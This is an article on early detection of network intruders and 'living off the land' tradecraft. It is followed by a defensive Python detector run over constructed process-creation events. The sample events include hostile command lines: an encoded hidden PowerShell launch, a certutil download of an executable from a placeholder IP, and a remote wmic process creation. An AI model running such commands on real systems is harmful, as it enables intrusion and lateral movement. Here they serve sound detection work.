Spot the Intruder: Don't Miss Your Shot
The first few days following a cyberattack are "golden" for detecting malicious activity on your network, said Stuart McKenzie, vice president of Mandiant EMEA at FireEye, during a discussion of incident response at US companies.
More attackers, both nation-states and cybercriminals, are "living off the land," using legitimate, already-installed tools to move through an environment and stay hidden, said Wendi Whitmore, global lead of IBM X-Force Incident Response and Intelligence Services. "We continue to see that spread," she noted. Some attackers aren't as adept at wielding those tools, which may give them away.
Companies need to do more to cut down "dwell time," the amount of time an attacker is on the network before being detected, McKenzie explained. The first or second stage of an intrusion is crucial, he said, because this is when an intruder displays the most unusual activity. Once on the network for a few days, the intruder will try to move laterally and harvest credentials, after which their actions blend in with those of normal users. From that moment, the defenders' job becomes even more difficult. "If you catch them early on, then you can make moves," McKenzie said.
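To make the "catch them early" point concrete, here is an added example (not code from the article, FireEye, Mandiant or IBM) of the kind of detection that works during that noisy first stage: a handful of living-off-the-land rules run over constructed Sysmon-style process-creation events. The hosts, users, command lines and rule names are hypothetical; the behaviours the rules look for (an Office process spawning a shell, encoded PowerShell, certutil fetching a file, wmic creating a process on a remote host) are well-known early-stage tradecraft.

```python
"""
Living-off-the-land detection over process-creation telemetry.
Example code added for illustration; the events, hosts and rule names are
assumptions, not data or tooling from the article or from Mandiant/IBM.
"""

# Constructed sample telemetry (Sysmon Event ID 1 style). Hypothetical hosts,
# users and command lines; not taken from any real incident.
EVENTS = [
    {"host": "ws01", "user": "CORP\\alice", "parent": "explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"host": "ws01", "user": "CORP\\alice", "parent": "WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "ws01", "user": "CORP\\alice", "parent": "cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.10/a.txt a.exe"},
    {"host": "srv02", "user": "CORP\\svc_backup", "parent": "services.exe",
     "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "WmiPrvSE.exe"},
    {"host": "ws01", "user": "CORP\\alice", "parent": "cmd.exe",
     "image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmdline": 'wmic /node:srv02 process call create "cmd.exe /c whoami"'},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path):
    """Lower-cased file name from a Windows path (works on non-Windows hosts too)."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rule_office_spawns_shell(ev, args):
    """An Office application launching a scripting host or shell."""
    return basename(ev["parent"]) in OFFICE_PARENTS and basename(ev["image"]) in SHELLS


def rule_powershell_encoded(ev, args):
    """powershell.exe given an encoded command block."""
    if basename(ev["image"]) != "powershell.exe":
        return False
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand
    # (-e, -enc, ...), so test the argument as a prefix of the full switch
    # rather than looking for one fixed spelling. "-ex", "-ep" etc. do not match.
    return any(len(a) >= 2 and "-encodedcommand".startswith(a.replace("/", "-", 1))
               for a in args)


def rule_certutil_download(ev, args):
    """certutil used as a downloader or base64 decoder."""
    return basename(ev["image"]) == "certutil.exe" and bool({"-urlcache", "-decode"} & set(args))


def rule_wmic_remote_exec(ev, args):
    """wmic creating a process on another host (lateral movement)."""
    return (basename(ev["image"]) == "wmic.exe"
            and any(a.startswith("/node:") for a in args)
            and {"process", "call", "create"} <= set(args))


RULES = [rule_office_spawns_shell, rule_powershell_encoded,
         rule_certutil_download, rule_wmic_remote_exec]


def detect(events):
    """Return (rule_name, host, user, cmdline) for every rule each event trips."""
    alerts = []
    for ev in events:
        args = ev["cmdline"].lower().split()[1:]   # drop argv[0], compare case-insensitively
        for rule in RULES:
            if rule(ev, args):
                alerts.append((rule.__name__[len("rule_"):], ev["host"], ev["user"], ev["cmdline"]))
    return alerts


if __name__ == "__main__":
    for name, host, user, cmd in detect(EVENTS):
        print(f"[{name}] {host} {user}: {cmd}")
```

On the constructed sample, the notepad launch and the service-hosted WmiPrvSE.exe pass cleanly while the Office-to-PowerShell chain, the encoded command, the certutil download and the remote wmic call each raise an alert. These are command-line-content rules, and that is exactly their limit: once the intruder holds valid credentials and uses ordinary administrative channels, the command lines look like an admin's, and detection has to shift to behavioural baselines (which accounts log on where, from which hosts, at what hours), which is the harder job McKenzie is describing.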